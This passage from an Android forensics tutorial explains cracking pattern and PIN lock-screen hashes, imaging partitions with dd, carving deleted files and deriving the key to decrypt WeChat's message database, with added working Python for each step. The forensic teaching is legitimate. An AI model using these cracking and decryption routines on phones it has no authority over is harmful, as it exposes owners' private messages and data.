Note that these files exist on Android 5.x and earlier. From Android 6.0 the pattern and PIN are stored as gatekeeper.pattern.key and gatekeeper.password.key and verified by the Gatekeeper component with a device-bound key, so the offline hash attacks described below no longer apply.<br />
Many tools exist that will bypass lock screens automatically. We will use Andriller which can be downloaded from – <a href="https://andriller.com/">https://andriller.com/</a><br />
<strong>Cracking an Android pattern lock – </strong>Now we have gesture.key, which contains the pattern lock information, let’s take a look at the file contents:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn28.png" /></div>
The hex contents of the file are an unsalted SHA-1 hash of the swipe
pattern, computed over the node indices (0 to 8) as raw bytes. The
simplest method for cracking this hash is a dictionary attack, since
there is a limited number of patterns (4 nodes minimum, 9 maximum, and a
stroke may not skip over an unvisited node). CCL Forensics, based in the
UK, provides a free Python script to create the hash dictionary. It can
be downloaded at <a href="http://www.cclgroupltd.com/product/android-pattern-lockscripts/">http://www.cclgroupltd.com/product/android-pattern-lockscripts/</a><br />
The file is GenerateAndroidGestureRainbowTable.py. To run it, Python 3
must be installed on the examiner’s system. Python 3 can be downloaded
at https://www.python.org/downloads/. Many forensics tools provide
Python support or use it themselves, so an examiner may already have it
installed. To execute the file, simply navigate to the directory
containing it and run:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn29.png" /></div>
Once it completes, there should now be a file called
AndroidLockScreenRainbow.sqlite in the same directory as the
GenerateAndroidGestureRainbowTable.py script. Now that we have a
database containing the hash of every possible Android pattern, we
simply need to look up the hash we found in the gesture.key file. This
can be done manually with an SQLite viewer or even SQL commands.
However, CCL Forensics also provides Android_GestureFinder.py, a script
that will look up the hash in the database created previously. Ensure
that the AndroidLockScreenRainbow.sqlite and gesture.key files are in
the same directory as Android_GestureFinder.py, and run the following
script:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn30.png" /></div>
The output should return very quickly, as it is performing a simple
lookup in the hash database. The Hash column shows the hash value that
was found, and the Pattern is the corresponding lock screen pattern
which is 0 4 8 7 6.<br />
Another method of doing this is by looking up the hash value in the
hash database. The hash value can be searched over the internet, or it
can be read using DB browser for SQLite.<br />
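The generator and lookup below are an added example, not the CCL Forensics scripts. They build the gesture.key hash table in memory rather than in an SQLite file, and go one step further than a plain enumeration of node sequences: only patterns the lock screen can actually draw are included (a stroke cannot skip over an unvisited node), which keeps the table at 389,112 entries. The gesture.key bytes looked up are computed from the article’s 0 4 8 7 6 pattern rather than pulled from a device.<br />

```python
import hashlib

def _gap_node(a, b):
    """Node Android fills in when the stroke from a to b passes over a
    third node (two apart in a row or column, or opposite corners through
    the centre); None when the move is direct."""
    ra, ca = divmod(a, 3)
    rb, cb = divmod(b, 3)
    if a != b and (ra - rb) % 2 == 0 and (ca - cb) % 2 == 0:
        return ((ra + rb) // 2) * 3 + (ca + cb) // 2
    return None

def valid_patterns(min_len=4, max_len=9):
    """Every pattern the lock screen can actually record: 4 to 9 distinct
    nodes, never jumping over a node that has not been visited yet.
    Enumerating all node sequences instead would include patterns the
    UI would have drawn differently and waste about 60% of the table."""
    def extend(path, visited):
        if len(path) >= min_len:
            yield tuple(path)
        if len(path) == max_len:
            return
        for nxt in range(9):
            if nxt in visited:
                continue
            gap = _gap_node(path[-1], nxt)
            if gap is not None and gap not in visited:
                continue
            path.append(nxt)
            visited.add(nxt)
            yield from extend(path, visited)
            path.pop()
            visited.discard(nxt)
    for start in range(9):
        yield from extend([start], {start})

def gesture_hash(pattern):
    """gesture.key is the unsalted SHA-1 of the node indices as raw bytes."""
    return hashlib.sha1(bytes(pattern)).hexdigest()

def build_table(min_len=4, max_len=9):
    """hash -> pattern for every valid pattern (the in-memory equivalent of
    the CCL rainbow-table SQLite file)."""
    return {gesture_hash(p): p for p in valid_patterns(min_len, max_len)}

def lookup(gesture_key_bytes, table):
    """Resolve the 20 bytes read from gesture.key, or None if absent."""
    return table.get(gesture_key_bytes.hex())

if __name__ == "__main__":
    table = build_table()
    key = bytes.fromhex(gesture_hash((0, 4, 8, 7, 6)))   # stands in for a pulled gesture.key
    print(len(table), "patterns;", key.hex(), "->", lookup(key, table))
```

To use it on evidence, read the 20 bytes of the pulled gesture.key and pass them to lookup(); building the table takes a second or two, so there is little reason to persist it unless many devices are being processed.<br />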
<strong>Cracking an Android PIN/Password</strong> – To crack the
PIN/Password lock, we’ll need to take a look at the contents of the
files pulled earlier. password.key is very similar to gesture.key: it
contains a hash of the password, 72 hex characters made up of a SHA-1
digest followed by an MD5 digest, both computed over the password
concatenated with the salt from the settings database, as shown in the
following screenshot:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn31.png" /></div>
CCL Forensics provides a useful Python script for this purpose. Other
cracking tools, such as hashcat, could also be used. The CCL Forensics
PIN/Password tool can be downloaded for free at
http://www.cclgroupltd.com/product/android-pin-password-lock-tool/. Two
files will be downloaded, BruteForceAndroidPin.py and
RecoverAndroidPIN.py. RecoverAndroidPIN.py is for locating the necessary
files within a physical image; we won’t be needing it for our purposes.<br />
The format for BruteForceAndroidPIN.py is:<br />
<strong>python BruteForceAndroidPIN.py &lt;hash&gt; &lt;salt&gt; &lt;max code length (4-16)&gt; t</strong><br />
The trailing t argument indicates that the hash is of an alphanumeric
password rather than a numeric PIN; it is not needed for cracking a PIN
and would only enlarge the search space and the time it takes to run. The
salt is the lockscreen.password_salt value from the settings database
pulled earlier. Here is the sample screenshot –<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn32.png" /></div>
The PIN from this example was 2587 as indicated in the output.<br />
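Added example, not the CCL script: the password.key format and a brute force against it in Python. It assumes the scheme Android used up to 5.x, where password.key holds SHA-1 and MD5 of the PIN concatenated with the salt from lockscreen.password_salt, rendered the way Java’s Long.toHexString does. The salt value used when run is invented.<br />

```python
import hashlib
import string
from itertools import product

def salt_string(salt_long):
    """settings.db / locksettings.db keep lockscreen.password_salt as a signed
    64-bit value; Android feeds Java's Long.toHexString(salt) into the hash,
    i.e. unsigned lower-case hex without leading zeros."""
    return format(salt_long & 0xFFFFFFFFFFFFFFFF, "x")

def password_key(secret, salt_long):
    """What Android (up to 5.x) writes to /data/system/password.key:
    SHA-1(secret || salt) followed by MD5(secret || salt), 72 upper-case hex."""
    data = (secret + salt_string(salt_long)).encode()
    return (hashlib.sha1(data).hexdigest() + hashlib.md5(data).hexdigest()).upper()

def crack(password_key_hex, salt_long, min_len=4, max_len=4, alphabet=string.digits):
    """Brute-force the secret. Only the SHA-1 half is compared while searching
    (the cheaper test); the MD5 half then confirms the hit so a chance SHA-1
    match is never reported. Digits only = PIN; pass a wider alphabet for a
    password, which is what the CCL script's trailing 't' selects."""
    target = password_key_hex.upper()
    salt = salt_string(salt_long).encode()
    for length in range(min_len, max_len + 1):
        for combo in product(alphabet, repeat=length):
            candidate = "".join(combo).encode() + salt
            if hashlib.sha1(candidate).hexdigest().upper() == target[:40]:
                if hashlib.md5(candidate).hexdigest().upper() == target[40:]:
                    return "".join(combo)
    return None

if __name__ == "__main__":
    salt = -4567890123456789012            # invented lockscreen.password_salt
    key = password_key("2587", salt)       # stands in for a pulled password.key
    print("password.key:", key)
    print("recovered PIN:", crack(key, salt, max_len=6))
```

A four-digit PIN falls in a fraction of a second; the cost grows as alphabet size to the power of length, which is why the max length argument matters far more than the hash speed for alphanumeric passwords.<br />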
<h1>
Extracting Data Physically from Android Devices</h1>
Physical extraction is an exact bit-for-bit image of the electronic
media. On a computer it involves removing the evidence drive and
imaging it through a write blocker; the output is frequently
referred to as a <strong>raw image</strong>, or simply a <strong>bin </strong>(binary)
file. On an Android device the flash memory cannot be removed without
chip-off, so to image it manually we execute commands on the device
from the ADB shell, and these require root permissions. If root access
cannot be obtained, a removable SD card can generally still be imaged on
the examiner’s workstation.<br />
<strong>Extracting data physically with dd – </strong>The dd command is
frequently used in forensics to create bit-by-bit images of entire
drives. The form used here is as follows –<br />
<strong>dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 conv=notrunc,noerror,sync<br />
</strong><br />
The conv options must be written as one comma-separated word with no spaces; the shell would otherwise pass anything after a space to dd as a separate argument.<br />
Flags Meaning –<br />
<ul>
<li>if: the path of the input file to read from.</li>
<li>of: the path of the output file to write to.</li>
<li>bs: the block size. It defaults to 512 bytes if not specified.</li>
<li>conv: the conversion options, as a comma-separated list:
<ul>
<li>notrunc: do not truncate the output file.</li>
<li>noerror: continue imaging if a read error is encountered.</li>
<li>sync: in conjunction with the noerror option, pad each short or failed
read with \x00 up to the block size. This is important for maintaining file
offsets within the image.</li>
</ul>
</li>
</ul>
<strong>Determine what to Image</strong> – When imaging a computer,
an examiner must first find what the drive is mounted as; /dev/sda, for
example. The first step is to launch the ADB shell and run the cat
/proc/partitions command as shown below –<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn33.png" /></div>
mmcblk0 is the entirety of the flash memory on the device; mmcblk0p1 to
mmcblk0p29 are the partitions within it, and the #blocks column gives
each one’s size in 1 KiB blocks. To obtain a full image of the device’s
internal memory, we would run the dd command with mmcblk0 as the input
file. Most of these partitions are unlikely to be forensically
interesting. To view the corresponding names for each partition, we can
look in the device’s by-name directory. This does <em>not </em>exist on
every device and is sometimes on a different path, but for this device,
it is found at /dev/block/msm_sdcc.1/by-name. By navigating to that
directory and running the ls -al command, we can see where each name
is symbolically linked, as shown in the following screenshot:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn34.png" /></div>
If our investigation was only interested in the userdata partition, we now know that it is<br />
mmcblk0p28, and could use that as the input file to the dd command.<br />
If the by-name directory does not exist on the device, it may not be
possible to identify every partition on the device. However, many of
them can still be found by using the mount command within the ADB shell.<br />
<strong>Writing dd output to SD Card</strong> – The output file of
the dd command can be written to the device’s SD card. On newer devices,
/sdcard is not a separate card but emulated storage backed by
/data/media. To determine where the SD card is symbolically linked to,
open the ADB shell and run the ls -al command on /sdcard. If the SD card
partition is not shown, the SD card likely needs to be mounted in
recovery mode. Bear in mind that if /sdcard is emulated storage, the
image is being written onto the very /data partition that is being read:
this alters the evidence while it is imaged and needs as much free space
in /data as the partition is large, so a physical SD card, or streaming
the dd output over ADB to the workstation instead, is preferable.<br />
After determining which block to read and to where the SD card is
symbolically linked, image the /data partition to the /sdcard, using the
following command –<br />
<strong>dd if=/dev/block/mmcblk0p28 of=/sdcard/data.img bs=512 conv=notrunc,noerror,sync<br />
</strong><br />
The output is shown below –<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn35.png" /><strong><br />
</strong><br />
Now, an image of the /data partition exists on the SD card. It can be
pulled to the examiner’s machine with the ADB pull command or simply
read from the SD card.<br />
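Added example, not from the article: helpers for the imaging steps above, in Python on the workstation rather than on the device. They parse /proc/partitions (a constructed listing), resolve a constructed by-name directory of symlinks, build the dd command with correctly formatted conv options, and check that a pulled image has the exact size dd must have produced (the device size rounded up to the block size, because of conv=sync) before hashing it.<br />

```python
import hashlib
import os
import tempfile

# Constructed /proc/partitions output; sizes are in 1 KiB blocks.
SAMPLE_PARTITIONS = """major minor  #blocks  name

 179        0   15388672 mmcblk0
 179        1      65536 mmcblk0p1
 179        2      16384 mmcblk0p2
 179       28   13000000 mmcblk0p28
 179       29     120832 mmcblk0p29
"""

def parse_proc_partitions(text):
    """{block name: size in bytes}."""
    sizes = {}
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) == 4:
            sizes[parts[3]] = int(parts[2]) * 1024
    return sizes

def partition_names(by_name_dir):
    """{label: block name} from the by-name symlinks, e.g. userdata -> mmcblk0p28."""
    return {entry: os.path.basename(os.readlink(os.path.join(by_name_dir, entry)))
            for entry in os.listdir(by_name_dir)}

def sample_by_name_dir():
    """A constructed by-name directory (symlinks only; no real devices)."""
    path = tempfile.mkdtemp()
    for label, block in (("boot", "mmcblk0p2"), ("userdata", "mmcblk0p28"), ("cache", "mmcblk0p29")):
        os.symlink("/dev/block/" + block, os.path.join(path, label))
    return path

def dd_command(label, by_name, bs=4096):
    """The device-side command; conv options are comma-separated, no spaces."""
    block = by_name.get(label, label)
    return "dd if=/dev/block/%s of=/sdcard/%s.img bs=%d conv=notrunc,noerror,sync" % (block, label, bs)

def expected_image_size(device_bytes, bs=4096):
    """With conv=sync dd pads the last short block, so a complete image is
    the device size rounded up to a multiple of bs."""
    return -(-device_bytes // bs) * bs

def check_image(path, device_bytes, bs=4096):
    """Fail if the pulled image is not the size dd must have produced, else
    return its SHA-256 for the chain-of-custody record."""
    size = os.path.getsize(path)
    want = expected_image_size(device_bytes, bs)
    if size != want:
        raise ValueError("%s is %d bytes, expected %d: incomplete or wrong block" % (path, size, want))
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def constructed_image(size):
    """A zero-filled file standing in for a pulled .img (constructed)."""
    path = os.path.join(tempfile.mkdtemp(), "data.img")
    with open(path, "wb") as fh:
        fh.write(b"\x00" * size)
    return path

if __name__ == "__main__":
    sizes = parse_proc_partitions(SAMPLE_PARTITIONS)
    by_name = partition_names(sample_by_name_dir())
    for label, block in sorted(by_name.items()):
        print("%-9s %-11s %12d bytes" % (label, block, sizes[block]))
        print("   ", dd_command(label, by_name))
```

On a real case feed parse_proc_partitions the text from adb shell cat /proc/partitions and partition_names a pulled copy of the by-name directory (adb pull keeps the symlinks); a size mismatch in check_image almost always means the pull was interrupted or the wrong block was imaged.<br />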
<strong>Note – The partitions seen above are Multimedia Card (MMC)
blocks, which are typical of newer devices. Much older devices are more
likely to expose Memory Technology Device (MTD) blocks. In that case the
dd command may not work, and the nanddump command can be used instead for
reading and extracting data from MTD blocks.</strong><br />
<strong>Analysis of Extracted Image – </strong>For analyzing a full
image we can make use of tools such as Cellebrite, XRY, Mobile Phone
Examiner, and so on. But these are not free, so we will make use of a
free, open source tool instead. The most popular free and open source
analysis tool is Autopsy.<br />
Autopsy – Autopsy can be downloaded at <a href="http://www.sleuthkit.org/">http://www.sleuthkit.org/</a>.
Once the image has been loaded, expanding the image will show all the
volumes that Autopsy found, as shown in the following screenshot –<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn36.png" /></div>
One of the volumes will contain the data partition, which holds the data of
all the applications as discussed earlier. As each application is
installed, a directory is created for it, and the forensic investigator
can go through the directory created for each application to
analyze the data present in it.<br />
<strong>Imaging RAM</strong> – The most common tool for Android RAM acquisition is the <strong>Linux Memory Extractor </strong>(<strong>LiME</strong>),
previously known as DMD. It works only on Linux-based systems. It is not
highly user-friendly, as it requires the user to compile it from
source. The compilation must also be repeated for each specific kernel of
each device being examined, because LiME is a kernel module that has to
be built against the exact kernel it will be loaded into, and loading it
requires root and a kernel that permits module loading.<br />
If usage of Lime is not possible, then <strong>mem </strong>tool can also be used for Imaging RAM. The mem tool can be downloaded at <a href="http://sourceforge.net/projects/androidforensics-mem/files/">http://sourceforge.net/projects/androidforensics-mem/files/</a>. Mem is an executable binary that needs to be pushed to the device.<br />
<strong>Acquiring Android SD cards – </strong>Physically imaging an
SD card is very similar to the physical imaging with dd shown above: we
image the SD card partition (or the card itself, through a write-blocked
reader on the workstation), and the analysis process is the same as
discussed above.<br />
<strong>Advance Forensics method using JTAG and Chip-off</strong> –<br />
<strong>JTAG</strong> – It is used to communicate with the processor
through a specialized interface for testing purposes. For forensic
examiners, it also allows them to communicate directly with the
processor and retrieve a full physical image of the flash memory.<br />
JTAG has two advantages –<br />
<ol>
<li>It does not require the device to boot (only to be powered), and so:
<ul>
<li>Can be successful even if the device is damaged</li>
<li>There are no RF-shielding concerns</li>
<li>Does not require root, ADB, or USB debugging</li>
</ul>
</li>
<li>It can be used to recover device PINs/passwords, and so:
<ul>
<li>Can image the entire flash memory and recover/crack password files</li>
</ul>
</li>
</ol>
Many of the common ones used for mobile forensics can be found at
http://teeltech.com/mobile-device-forensic-tools/jtag-equipment/. The
RIFF box listed on the site is probably the most frequently used for
mobile forensics.<br />
<strong>Chip-off – </strong>Chip-off involves heating the device’s
circuit board until the solder holding the components to the board
melts, and then removing the flash memory chip. The memory chip can then
be read using commercial tools, resulting in a full physical image. The
process of melting the solder (commonly called reflow or rework) is
used to place and remove components from a circuit board, and the
readers used to acquire the memory are used to both read and write to
memory chips, often in bulk quantities.<br />
<h1>
Recovering Deleted Data from Device</h1>
When a user deletes data from the device, the data itself is not
erased immediately. What is removed is the filesystem’s reference to it:
all filesystems keep metadata that records the hierarchy of files, file
names, and which blocks they occupy, and deletion marks those entries and
blocks as free. Hence it is possible to recover the deleted data until
the blocks are reused. Two caveats apply on modern devices: flash storage
with TRIM/discard enabled may erase freed blocks soon after deletion, and
on devices using full-disk or file-based encryption the freed blocks are
only readable if the image was taken from the decrypted view.<br />
<strong>Recovering data deleted from an SD card – </strong>SD cards are normally formatted with the FAT32
filesystem (large cards with exFAT). If the card is removable, it can be mounted as a drive
by connecting it to a computer with a card reader. In forensics, to
make sure that the original evidence is not modified, a physical image
of the disk is taken, and all further work is done on the
image itself; the same applies to SD card analysis. Acquire the image with a tool such
as dd (ideally with the card behind a hardware write blocker), record its hash, and then load
the image into a free tool such as FTK Imager to extract the data in it,
deleted entries included. The extracted data is then used for
further analysis.<br />
Example – The image below shows the deleted data recovered using FTK Imager<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn37.png" /></div>
<div style="text-align: center;">
<em>Deleted data recovered with FTK Imager<br />
</em></div>
Apart from this, we can use another tool called Scalpel. Once
we have an image of the phone’s storage, Scalpel can carve files out of
it. Scalpel is a file carver: it scans the raw image for the header and
footer byte signatures of known file types (defined in its scalpel.conf)
and extracts the data between them, without consulting the filesystem
metadata at all. That makes it filesystem independent, and it is known to
work on images of FAT, NTFS, EXT2, EXT3, HFS, and so on.<br />
Because carving ignores the filesystem, a file whose blocks were not contiguous, or whose footer has since been overwritten, comes back incomplete. This is why some pictures are recovered completely while others are not, as shown in the following screenshot:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn38.png" /><span style="font-size: 18pt;"><br />
</span></div>
<div style="text-align: center;">
Recovered Image using Scalpel</div>
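The header/footer carving that Scalpel performs, as an added example that is not code from the original article or from the Scalpel project. It scans a byte buffer for JPEG and PNG signatures (a tiny subset of what scalpel.conf lists) and extracts whatever lies between them, ignoring filesystem metadata entirely; the sample image is constructed inline with one intact JPEG, one intact PNG and one JPEG whose footer was overwritten, which comes back as a partial file exactly as in the screenshot above.<br />

```python
"""File carving over a raw image, in the style of Scalpel.

Added example, not code from the original article or from the Scalpel
project. It scans a byte buffer for JPEG and PNG header/footer
signatures and extracts whatever lies between them, ignoring filesystem
metadata entirely. The sample image is constructed inline: slack space,
one intact JPEG, one intact PNG and one JPEG whose footer was overwritten.
"""
import os
import sys

# header -> footer byte signatures (a tiny subset of what scalpel.conf lists)
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
}
MAX_FILE_SIZE = 20 * 1024 * 1024  # stop looking for a footer after 20 MiB


def carve(image: bytes, max_size: int = MAX_FILE_SIZE):
    """Return a list of (type, offset, data, complete) tuples, sorted by offset.

    A header with no matching footer within max_size is still carved, as an
    incomplete file cut at max_size or at the end of the image. Those are
    the pictures that come back only partially recovered.
    """
    found = []
    for ftype, (header, footer) in SIGNATURES.items():
        pos = image.find(header)
        while pos != -1:
            window_end = min(len(image), pos + max_size)
            end = image.find(footer, pos + len(header), window_end)
            if end != -1:
                data = image[pos:end + len(footer)]
                complete = True
                resume = end + len(footer)
            else:
                data = image[pos:window_end]
                complete = False
                resume = pos + len(header)
            found.append((ftype, pos, data, complete))
            pos = image.find(header, resume)
    return sorted(found, key=lambda f: f[1])


def write_carved(results, outdir: str) -> list:
    """Write each carved object to outdir as <offset>.<type>, like Scalpel does."""
    os.makedirs(outdir, exist_ok=True)
    names = []
    for ftype, offset, data, complete in results:
        name = f"{offset:012d}{'' if complete else '.partial'}.{ftype}"
        with open(os.path.join(outdir, name), "wb") as fh:
            fh.write(data)
        names.append(name)
    return names


def build_sample_image() -> bytes:
    """Constructed sample, not a real SD card image."""
    slack = b"\x00" * 64
    jpeg_ok = b"\xff\xd8\xff\xe0" + b"JFIF-one" * 4 + b"\xff\xd9"
    png_ok = (b"\x89PNG\r\n\x1a\n" + b"IHDR-fake-chunk-" * 2
              + b"\x00\x00\x00\x00IEND\xaeB`\x82")
    jpeg_cut = b"\xff\xd8\xff\xe1" + b"JFIF-two" * 4  # footer overwritten
    return slack + jpeg_ok + slack + png_ok + slack + jpeg_cut + slack


if __name__ == "__main__":
    # usage: python carve.py sdcard.dd carved/   (no arguments: run on the sample)
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    outdir = sys.argv[2] if len(sys.argv) > 2 else "carved"
    for name in write_carved(carve(image), outdir):
        print(name)
```

Run it against a dd image of the card to get the same kind of output Scalpel gives; partial files are named with a .partial suffix so they can be triaged separately. The obvious limitation is the same as Scalpel’s: a carver cannot reassemble a fragmented file, and it cannot tell a real JPEG from three bytes that happen to look like its header, so carved output always needs to be checked by opening it.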
<h1>
Forensic Analysis of Android Applications</h1>
There are many ways an application can store data on the phone. In
app analysis, the forensic investigator works out what the app was used
for and finds the user data it left behind.<br />
<strong>Why app analysis – </strong>Almost all of the standard
phone functions, such as contacts, calls, internet browsing and SMS,
are carried out through applications on Android devices.
Second, a person’s app usage can tell you a lot about them: where
they’ve been, when they were there, who they’ve communicated with, and
even what they may be planning in the future. We will analyse two cases:
the WeChat application, and the SMS/MMS store. Linux is used throughout
this section.<br />
<strong>WeChat Analysis</strong> – WeChat is a text and voice
messaging service developed in China. It runs on smartphone platforms
such as Android, iPhone, Windows Phone and BlackBerry as
well as on desktop operating systems such as Windows and OS X.<br />
The following sections deal with the demo on the extraction of WeChat messages from its default storage database.<br />
<strong>Step 1:<br />
</strong><br />
Use apk2java to <span style="background-color: white;">decompile the WeChat .apk into Java source code.</span><strong><br />
</strong><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn39.png" /><strong><br />
</strong></div>
<strong>Step 2:<br />
</strong><br />
apk2java gives approximate Java source, decompiled from the Dalvik bytecode; it rarely compiles as-is, but it is enough to locate where the app stores its database and how it derives the key.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn40.png" /><strong><br />
</strong></div>
<div style="text-align: center;">
<em>Fig: APK extracted using apk2java<br />
</em></div>
<strong>Step 3:<br />
</strong><br />
Extract the WeChat application’s data directory from the device<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn41.png" /></div>
<strong>Step 4:<br />
</strong><br />
WeChat does not keep its data in the usual databases directory.
Instead, a MicroMsg directory serves as its equivalent, and a
per-account subdirectory inside MicroMsg contains the EnMicroMsg.db
database. This database is encrypted with SQLCipher, an open-source
SQLite extension that encrypts the whole database file, page by page,
with 256-bit AES. The helpful aspect of this, from the examiner’s point
of view, is that everything needed to derive the key is present on the
device itself.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn42.png" /><span style="background-color: white;"><br />
</span></div>
<span style="background-color: white;">/MicroMsg/<br />
</span><br />
<span style="background-color: white;">CompatibleInfo.cfg<br />
</span><br />
<span style="background-color: white;">/EnMicroMsg.db<br />
</span><br />
<span style="background-color: white;">Four SQLCipher parameters control how EnMicroMsg.db is encrypted, and all four must be set, key first, immediately after opening the file and before any other statement; otherwise SQLCipher applies its own defaults (which differ between versions) and reports the file as “not a database”.<br />
</span><br />
PRAGMA key: KEY<br />
Sets the passphrase from which the database key is derived.<br />
PRAGMA cipher_use_hmac: off<br />
Disables the per-page HMAC, for compatibility with databases written by SQLCipher 1.1.<br />
PRAGMA cipher_page_size: 1024<br />
Sets the database page size; it must match the size the file was written with.<br />
PRAGMA kdf_iter: 4000<br />
Sets the number of PBKDF2 iterations used to derive the key from the passphrase.<br />
<strong>Step 5:<br />
</strong><br />
<span style="background-color: white;">EnMicroMsg.db is an encrypted database; opened in an ordinary SQLite viewer it shows only ciphertext, as shown below:</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn43.png" /></div>
<div style="text-align: center;">
<em>Fig: Encrypt data of EnMicromsg.db<br />
</em></div>
<strong>Step 6:<br />
</strong><br />
The key for WeChat’s EnMicroMsg.db is derived from two values found on
the device: the phone’s IMEI and the WeChat account’s UIN. The two
strings are concatenated, with no separator, and hashed with MD5; the
first 7 characters of the hex digest are the “pragma key” used to open
the database.<br />
So the first thing to find is the IMEI of the device.<br />
<strong>Step 7:<br />
</strong><br />
<span style="background-color: white;">Dial <strong>*#06#</strong> on the phone to display its IMEI. On phones with a removable battery the IMEI is also printed on a label under the battery. A dual-SIM phone shows two IMEIs; if the first does not produce a working key, try the second.<br />
</span><br />
<span style="background-color: white;"><strong>Step 8:<br />
</strong></span><br />
Next find the WeChat UIN, the unique numeric id of the WeChat account. It is stored in the app’s preferences file system_config_prfs.xml under the app’s data directory.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn44.png" /></div>
<div style="text-align: center;">
<em>Fig: system_config_prfs.xml<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn45.png" /></div>
<div style="text-align: center;">
<em>Fig: UIN value<br />
</em></div>
<span style="background-color: white;"><strong>Step 9:<br />
</strong></span><br />
<span style="background-color: white; color: black;">Concatenate the IMEI
and UIN, with no separator or whitespace between them, and compute the
MD5 of the result. The key is the first 7 characters of the hex digest,
here 9C751DC. SQLCipher feeds the passphrase bytes through PBKDF2, so
case matters: if the uppercase form does not open the database, try the
lowercase hex digits.<br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn46.png" /><span style="background-color: white;"><br />
</span></div>
<div style="text-align: center;">
<em>Fig: MD5 Checksum tool<br />
</em></div>
<span style="background-color: white;"><strong>Step 10:<br />
</strong></span><br />
Now the most important tool, SQLCipher, is used to decrypt EnMicroMsg.db with the pragma key just derived.<br />
Open<span style="background-color: white;"> EnMicroMsg.db with SQLCipher 2.1, enter the pragma key and the three cipher PRAGMAs listed above, and the tables can be read as shown –<br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn47.png" /><span style="background-color: white;"><br />
</span></div>
<div style="text-align: center;">
<span style="background-color: white;"><em>Fig – Entering Pragma Key<br />
</em></span></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn48.png" /><span style="background-color: white;"><br />
</span></div>
<div style="text-align: center;">
<span style="background-color: white;"><em>Fig: Decoded – WeChat data<br />
</em></span></div>
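The key derivation and the SQLCipher statements from Steps 4 to 10, as an added example that is not code from the original article or from WeChat. It derives the key as described (first 7 hex characters of MD5(IMEI + UIN), no separator), emits the four PRAGMAs in the order SQLCipher needs them, and builds a script for the sqlcipher command-line shell that writes a plain SQLite copy. The UIN parser assumes the value sits in an &lt;int name="default_uin"&gt; entry of the preferences file; that attribute name is an assumption, so check it against the XML pulled from the device. The preferences XML and the IMEI are constructed placeholders.<br />

```python
"""Derive the EnMicroMsg.db key and build the SQLCipher statements to open it.

Added example, not the article's or WeChat's code. It implements the
derivation the article describes (first 7 hex characters of
MD5(IMEI + UIN)) and emits the four PRAGMAs in the order SQLCipher needs
them. The UIN parser assumes the value sits in an <int name="default_uin">
entry of the preferences file; that attribute name is an assumption, so
check it against the XML pulled from the device.
"""
import hashlib
import sys
import xml.etree.ElementTree as ET

# Constructed sample preferences file (not from a real device).
SAMPLE_PREFS_XML = """<?xml version='1.0' encoding='utf-8' ?>
<map>
    <int name="default_uin" value="1234567890" />
    <string name="login_user_name">user</string>
</map>
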